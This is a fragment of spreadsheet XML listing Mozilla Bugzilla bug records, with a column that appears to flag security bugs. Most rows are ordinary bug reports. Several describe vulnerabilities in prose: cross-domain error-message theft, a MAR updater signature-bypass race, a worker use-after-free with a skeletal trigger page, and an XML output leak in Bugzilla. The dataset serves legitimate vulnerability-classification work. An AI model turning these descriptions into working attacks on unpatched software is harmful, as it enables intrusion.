&lt;!-- BEGIN Optimal Workshop Intercept Snippet --&gt;&lt;div id='owInviteSnippet' style='position:fixed;right:20px;bottom:20px;width:280px;padding:20px;margin:0;border-radius:6px;background:#333333;color:#EEEEEE;text-align:left;z-index:2200000000;opacity:0;transition:opacity 500ms;-webkit-transition:opacity 500ms;display:none;'&gt;&lt;div id='owInviteMessage' style='padding:0;margin:0 0 20px 0;font-size:16px;'&gt;Got a spare 5 minutes to help us improve our website?&lt;/div&gt;&lt;a id='owInviteOk' href='https://d7771tp6.optimalworkshop.com/treejack/3dgs3a2z?tag=intercept&amp;utm_medium=intercept' target='_blank' style='color:#7DB6EE;font-size:16px;font-weight:bold;text-decoration:underline;'&gt;I'll do it&lt;/a&gt;&lt;a id='owInviteCancel' href='javascript:void(0)' onclick='this.parentNode.style.display="none";' style='color:#EEEEEE;font-size:14px;text-decoration:underline;float:right;'&gt;No thanks&lt;/a&gt;&lt;/div&gt;&lt;script&gt;var owOldOnload=window.onload;window.onload=function(){if(owOldOnload){owOldOnload();}if (document.cookie.indexOf('owInvite') == -1){document.cookie='owInvite=Done';var e = document.getElementById('owInviteSnippet');setTimeout(function(){e.style.display = 'block';e.style.opacity = 1;},2000);}};&lt;/script&gt;&lt;!-- END Optimal Workshop snippet --&gt;</t>
        </is>
      </c>
      <c r="X613" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="614">
      <c r="A614" t="n">
        <v>1385042</v>
      </c>
      <c r="B614" t="inlineStr">
        <is>
          <t>2017-07-27 11:20:38 -0700</t>
        </is>
      </c>
      <c r="C614" t="inlineStr">
        <is>
          <t>Flexible Spacer Appears in popup Windows</t>
        </is>
      </c>
      <c r="D614" t="inlineStr">
        <is>
          <t>2017-10-09 05:36:38 -0700</t>
        </is>
      </c>
      <c r="E614" t="n">
        <v>1</v>
      </c>
      <c r="F614" t="n">
        <v>1</v>
      </c>
      <c r="G614" t="n">
        <v>2</v>
      </c>
      <c r="H614" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I614" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J614" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K614" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N614" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P614" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q614" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R614" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S614" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T614" t="n">
        <v>1</v>
      </c>
      <c r="U614" t="n">
        <v>1</v>
      </c>
      <c r="V614" t="n">
        <v>7</v>
      </c>
      <c r="W614" t="inlineStr">
        <is>
          <t>Created attachment 8891001
Spacers-Popup-Window.png
STR:
1) Open a Pop-up Window (e.g. use Present on a Google Slide doc)
Results:
- Pop-up appears and show spacers next to URL field
Expected Results:
- No spacers should appear next to URL field</t>
        </is>
      </c>
      <c r="X614" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="615">
      <c r="A615" t="n">
        <v>461735</v>
      </c>
      <c r="B615" t="inlineStr">
        <is>
          <t>2008-10-26 20:28:47 -0700</t>
        </is>
      </c>
      <c r="C615" t="inlineStr">
        <is>
          <t>[FIX]Security: theft of strings cross-domain with redirect, &lt;script src&gt; and window.onerror</t>
        </is>
      </c>
      <c r="D615" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E615" t="n">
        <v>1</v>
      </c>
      <c r="F615" t="n">
        <v>1</v>
      </c>
      <c r="G615" t="n">
        <v>3</v>
      </c>
      <c r="H615" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I615" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J615" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K615" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N615" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P615" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q615" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R615" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S615" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T615" t="n">
        <v>1</v>
      </c>
      <c r="U615" t="n">
        <v>0</v>
      </c>
      <c r="V615" t="n">
        <v>32</v>
      </c>
      <c r="W615" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16
The URL above demos the problem nicely. Note that this is with FF3.0.3.
This is essentially a new twist to the existing bug:
https://bugzilla.mozilla.org/show_bug.cgi?id=363897
This bug was fixed in FF3, but the fix can be bypassed with the redirector trick.
Also note that the bug referenced above underestimates the severity of leaking JS error messages cross-domain. Hopefully my demo illustrates that.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X615" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="616">
      <c r="A616" t="n">
        <v>134022</v>
      </c>
      <c r="B616" t="inlineStr">
        <is>
          <t>2002-03-28 12:25:10 -0800</t>
        </is>
      </c>
      <c r="C616" t="inlineStr">
        <is>
          <t>PERFORMANCE: deleting old login cookies locks login checks</t>
        </is>
      </c>
      <c r="D616" t="inlineStr">
        <is>
          <t>2014-04-26 03:30:24 -0700</t>
        </is>
      </c>
      <c r="E616" t="n">
        <v>1</v>
      </c>
      <c r="F616" t="n">
        <v>1</v>
      </c>
      <c r="G616" t="n">
        <v>4</v>
      </c>
      <c r="H616" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I616" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J616" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K616" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N616" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P616" t="inlineStr"/>
      <c r="Q616" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R616" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S616" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T616" t="n">
        <v>1</v>
      </c>
      <c r="U616" t="n">
        <v>1</v>
      </c>
      <c r="V616" t="n">
        <v>35</v>
      </c>
      <c r="W616" t="inlineStr">
        <is>
          <t>CGI.pl's confirm_login() function runs a query to delete old login cookies
whenever a script runs that function and the user is not logged in (i.e.
quietly_check_login does not return a true value).  The query takes a number of
seconds to complete (I saw these queries running for 15-26 seconds on b.m.o.)
and causes quietly_check_login()'s user authentication queries to lock waiting
for it to complete, which slows down overall Bugzilla performance.
The login cookies deletion query should not run on such a regular basis.</t>
        </is>
      </c>
      <c r="X616" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="617">
      <c r="A617" t="n">
        <v>890853</v>
      </c>
      <c r="B617" t="inlineStr">
        <is>
          <t>2013-07-08 03:12:57 -0700</t>
        </is>
      </c>
      <c r="C617" t="inlineStr">
        <is>
          <t>MAR signature bypass in Updater could lead to downgrade</t>
        </is>
      </c>
      <c r="D617" t="inlineStr">
        <is>
          <t>2024-05-30 08:05:16 -0700</t>
        </is>
      </c>
      <c r="E617" t="n">
        <v>1</v>
      </c>
      <c r="F617" t="n">
        <v>1</v>
      </c>
      <c r="G617" t="n">
        <v>3</v>
      </c>
      <c r="H617" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I617" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J617" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K617" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L617" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M617" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N617" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O617" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P617" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main24+][adv-esr1709+] local attack by low-privileged user account</t>
        </is>
      </c>
      <c r="Q617" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R617" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S617" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T617" t="n">
        <v>1</v>
      </c>
      <c r="U617" t="n">
        <v>0</v>
      </c>
      <c r="V617" t="n">
        <v>29</v>
      </c>
      <c r="W617" t="inlineStr">
        <is>
          <t>Created attachment 771990
Proof of concept source + binary
The updater doesn't write-lock the user-supplied MAR file while it is using it. This leads to a race condition between the MAR file's signatures being validated and the actual access of data within the file.
If an attacker can change the file after the MAR signatures are validated, but before data is read, the attacker supplied MAR data will be what the updater uses. The proof-of-concept uses this to replace the version string which allows us to downgrade Firefox to a vulnerable version (at which point an attacker could use a previous vulnerability such as #888314 to execute arbitrary code).
I'd imagine  with further investigation into the MAR file format an attacker could feasibly have the updater extract and run their own files as part of the update process as well. This all runs as the SYSTEM user.
Proof-of-concept is attached. It expects the current directory to hold an update.original.mar file (tested with http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/20.0/update/win32/en-GB/firefox-20.0.complete.mar), which it will use to downgrade the Firefox installation in c:\Program Files (x86)\Mozilla Firefox\.
As with race conditions, timing can be a little finicky. On my PC (Win7 x64, updater.exe 22.0.0.4917) I find there's a 200ms window between ~250-450ms. Given no arguments, the PoC will start at 200ms and work its way up to 1000ms in 10ms increments until it succeeds.</t>
        </is>
      </c>
      <c r="X617" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="618">
      <c r="A618" t="n">
        <v>506268</v>
      </c>
      <c r="B618" t="inlineStr">
        <is>
          <t>2009-07-24 08:24:05 -0700</t>
        </is>
      </c>
      <c r="C618" t="inlineStr">
        <is>
          <t>Session restore fails halfway through, leaves tabs unloaded</t>
        </is>
      </c>
      <c r="D618" t="inlineStr">
        <is>
          <t>2009-09-24 14:31:56 -0700</t>
        </is>
      </c>
      <c r="E618" t="n">
        <v>1</v>
      </c>
      <c r="F618" t="n">
        <v>1</v>
      </c>
      <c r="G618" t="n">
        <v>2</v>
      </c>
      <c r="H618" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I618" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J618" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K618" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L618" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M618" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P618" t="inlineStr"/>
      <c r="Q618" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R618" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S618" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T618" t="n">
        <v>1</v>
      </c>
      <c r="U618" t="n">
        <v>0</v>
      </c>
      <c r="V618" t="n">
        <v>11</v>
      </c>
      <c r="W618" t="inlineStr">
        <is>
          <t>I've seen this pretty consistently over the past few days after nightly updates: session restore restores some windows/tabs but fails to restore all of them. The following message appears in the error console:
Error: [Exception... "Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIWebNavigation.canGoBack]"  nsresult: "0x80004005 (NS_ERROR_FAILURE)"  location: "JS frame :: chrome://browser/content/browser.js :: UpdateBackForwardCommands :: line 113"  data: no]
Source File: chrome://browser/content/tabbrowser.xml
Line: 857
Even worse this time around it left a window which appears in my Windows taskbar but is invisible (or at least I can't see it)...
This is Windows 7 RC if that makes any difference. I'm going to try disabling Weave for a bit to see if that changes the behavior.</t>
        </is>
      </c>
      <c r="X618" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="619">
      <c r="A619" t="n">
        <v>1478663</v>
      </c>
      <c r="B619" t="inlineStr">
        <is>
          <t>2018-07-26 07:04:33 -0700</t>
        </is>
      </c>
      <c r="C619" t="inlineStr">
        <is>
          <t>Update graphql related libraries</t>
        </is>
      </c>
      <c r="D619" t="inlineStr">
        <is>
          <t>2018-07-26 09:34:28 -0700</t>
        </is>
      </c>
      <c r="E619" t="n">
        <v>1</v>
      </c>
      <c r="F619" t="n">
        <v>1</v>
      </c>
      <c r="G619" t="n">
        <v>7</v>
      </c>
      <c r="H619" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I619" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J619" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K619" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L619" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M619" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N619" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P619" t="inlineStr"/>
      <c r="Q619" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R619" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S619" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T619" t="n">
        <v>1</v>
      </c>
      <c r="U619" t="n">
        <v>0</v>
      </c>
      <c r="V619" t="n">
        <v>5</v>
      </c>
      <c r="W619" t="inlineStr">
        <is>
          <t>pyup has opened a few PRs to update graphene-django/graphene/graphql-core, however Travis is currently failing. It's likely just a case of needing to combine the updates into one PR, and remove any deprecated API usages.
https://github.com/mozilla/treeherder/pull/3808
https://github.com/mozilla/treeherder/pull/3807
https://github.com/mozilla/treeherder/pull/3806</t>
        </is>
      </c>
      <c r="X619" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="620">
      <c r="A620" t="n">
        <v>323769</v>
      </c>
      <c r="B620" t="inlineStr">
        <is>
          <t>2006-01-17 07:38:10 -0800</t>
        </is>
      </c>
      <c r="C620" t="inlineStr">
        <is>
          <t>"Invalid Column Name" when exporting bug list to non-HTML format</t>
        </is>
      </c>
      <c r="D620" t="inlineStr">
        <is>
          <t>2006-01-19 11:50:55 -0800</t>
        </is>
      </c>
      <c r="E620" t="n">
        <v>1</v>
      </c>
      <c r="F620" t="n">
        <v>1</v>
      </c>
      <c r="G620" t="n">
        <v>4</v>
      </c>
      <c r="H620" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I620" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J620" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K620" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L620" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M620" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N620" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P620" t="inlineStr"/>
      <c r="Q620" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R620" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S620" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T620" t="n">
        <v>1</v>
      </c>
      <c r="U620" t="n">
        <v>0</v>
      </c>
      <c r="V620" t="n">
        <v>9</v>
      </c>
      <c r="W620" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
I have a query that contains about 60 bugs.  I selected the "CSV" link to export it and got an "Invalid Coumn Name" error.
Reproducible: Always
Steps to Reproduce:
1. Invoke bug report.
2. Click on "CSV" to export bug list.
Actual Results:  
Bugzilla crashes with the following errror messages:
Invalid Column Name
Bugzilla has suffered an internal error. Please save this page and send it to bugzilla@seldonsystems.com with details of what you were doing at the time this message appeared.
URL: http://team.seldonsystems.com/bugzilla/buglist.cgi?short_desc_type=allwordssubstr&amp;short_desc=&amp;product=XB&amp;long_desc_type=allwordssubstr&amp;long_desc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_file_loc=&amp;bug_status=NEW&amp;bug_status=ASSIGNED&amp;bug_status=REOPENED&amp;emailassigned_to1=1&amp;emailtype1=substring&amp;email1=&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailqa_contact2=1&amp;emailcc2=1&amp;emailtype2=substring&amp;email2=&amp;bugidtype=include&amp;bug_id=&amp;changedin=&amp;chfieldfrom=&amp;chfieldto=Now&amp;chfieldvalue=&amp;namedcmd=2%20verify&amp;newqueryname=XB%20open&amp;tofooter=1&amp;field0-0-0=noop&amp;type0-0-0=noop&amp;value0-0-0=&amp;query_format=advanced&amp;ctype=csv
The custom sort order specified in your cookie contains an invalid column name CASE WHEN map_reporter.realname = '' THEN map_reporter.login_name ELSE map_reporter.realname END AS reporter_realname. The cookie has been cleared.
Expected Results:  
The bug list as a CSV file.</t>
        </is>
      </c>
      <c r="X620" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="621">
      <c r="A621" t="n">
        <v>325250</v>
      </c>
      <c r="B621" t="inlineStr">
        <is>
          <t>2006-01-30 11:28:48 -0800</t>
        </is>
      </c>
      <c r="C621" t="inlineStr">
        <is>
          <t>Some places notifications hang browser</t>
        </is>
      </c>
      <c r="D621" t="inlineStr">
        <is>
          <t>2009-11-26 05:32:40 -0800</t>
        </is>
      </c>
      <c r="E621" t="n">
        <v>1</v>
      </c>
      <c r="F621" t="n">
        <v>1</v>
      </c>
      <c r="G621" t="n">
        <v>2</v>
      </c>
      <c r="H621" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I621" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J621" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K621" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L621" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M621" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N621" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P621" t="inlineStr"/>
      <c r="Q621" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R621" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S621" t="inlineStr">
        <is>
          <t>Firefox 2 alpha1</t>
        </is>
      </c>
      <c r="T621" t="n">
        <v>1</v>
      </c>
      <c r="U621" t="n">
        <v>0</v>
      </c>
      <c r="V621" t="n">
        <v>5</v>
      </c>
      <c r="W621" t="inlineStr">
        <is>
          <t>The problem is that some notifications like ClearHistory cause a new node and corresponding observer to be created. We therefore get into an infinite loop of notifying observers and having them create a new observer.</t>
        </is>
      </c>
      <c r="X621" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="622">
      <c r="A622" t="n">
        <v>814026</v>
      </c>
      <c r="B622" t="inlineStr">
        <is>
          <t>2012-11-21 08:36:51 -0800</t>
        </is>
      </c>
      <c r="C622" t="inlineStr">
        <is>
          <t>ListenerManager Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-1591)</t>
        </is>
      </c>
      <c r="D622" t="inlineStr">
        <is>
          <t>2013-04-30 18:41:38 -0700</t>
        </is>
      </c>
      <c r="E622" t="n">
        <v>1</v>
      </c>
      <c r="F622" t="n">
        <v>1</v>
      </c>
      <c r="G622" t="n">
        <v>3</v>
      </c>
      <c r="H622" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I622" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J622" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K622" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L622" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M622" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N622" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P622" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q622" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R622" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S622" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T622" t="n">
        <v>1</v>
      </c>
      <c r="U622" t="n">
        <v>0</v>
      </c>
      <c r="V622" t="n">
        <v>33</v>
      </c>
      <c r="W622" t="inlineStr">
        <is>
          <t>Created attachment 684041
PoC
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s) Tested: Mozilla Firefox 12.0
Platform(s) Tested: Windows XP SP3
--------------------- 
Vulnerability details 
---------------------
The vulnerable function is ListenerManager::DispatchEvent within dom/workers/ListenerManager.cpp
From the researcher:
Registered event listeners are stored in temporary |js::Vector| before being
called one by one. When the number of |jsval|s held in |listeners| exceeds 10,
storage space for them is allocated on the heap. Thus, they are unreachable
from garbage collector roots. During user-provided event handling callback, one
is free to remove/unregister all the listeners and force garbage collection. |jsval|s kept in |listeners| will become dangling pointers.
The code below triggers the vulnerability: 
--------------- 
Begin Code Snip 
---------------
&lt;!DOCTYPE html&gt;
&lt;!--
     Mozilla Firefox 12.0
     ListenerManager dangling pointer
     Windows XP SP3 x86 code exec
     regenrecht@o2.pl May 2012
--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body onload="run();"&gt;
&lt;/body&gt;
&lt;/html&gt;
--------------- 
End Code Snip 
---------------
This code will create a listener that will erase all subsequent listeners and replace them with memory that'll result in EIP being c1c2c3c4
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 180 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 180 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X622" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="623">
      <c r="A623" t="n">
        <v>263780</v>
      </c>
      <c r="B623" t="inlineStr">
        <is>
          <t>2004-10-10 15:09:37 -0700</t>
        </is>
      </c>
      <c r="C623" t="inlineStr">
        <is>
          <t>xml output format ignores insidergroup and timetrackinggroup, displays private comments</t>
        </is>
      </c>
      <c r="D623" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:41 -0800</t>
        </is>
      </c>
      <c r="E623" t="n">
        <v>1</v>
      </c>
      <c r="F623" t="n">
        <v>1</v>
      </c>
      <c r="G623" t="n">
        <v>4</v>
      </c>
      <c r="H623" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I623" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J623" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K623" t="inlineStr">
        <is>
          <t>2.19</t>
        </is>
      </c>
      <c r="L623" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M623" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N623" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P623" t="inlineStr">
        <is>
          <t>[does not affect 2.16.x] [fixed in 2.18rc3] [fixed in 2.19.1]</t>
        </is>
      </c>
      <c r="Q623" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R623" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S623" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T623" t="n">
        <v>1</v>
      </c>
      <c r="U623" t="n">
        <v>0</v>
      </c>
      <c r="V623" t="n">
        <v>11</v>
      </c>
      <c r="W623" t="inlineStr">
        <is>
          <t>show_bug.cgi?id=1&amp;ctype=xml
shows all fields and comments even if not authorized</t>
        </is>
      </c>
      <c r="X623" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="624">
      <c r="A624" t="n">
        <v>56966</v>
      </c>
      <c r="B624" t="inlineStr">
        <is>
          <t>2000-10-17 04:54:52 -0700</t>
        </is>
      </c>
      <c r="C624" t="inlineStr">
        <is>
          <t>M18 for FreeBSD is not gziped</t>
        </is>
      </c>
      <c r="D624" t="inlineStr">
        <is>
          <t>2000-10-17 08:19:52 -0700</t>
        </is>
      </c>
      <c r="E624" t="n">
        <v>1</v>
      </c>
      <c r="F624" t="n">
        <v>1</v>
      </c>
      <c r="G624" t="n">
        <v>5</v>
      </c>
      <c r="H624" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I624" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J624" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K624" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L624" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M624" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N624" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P624" t="inlineStr"/>
      <c r="Q624" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
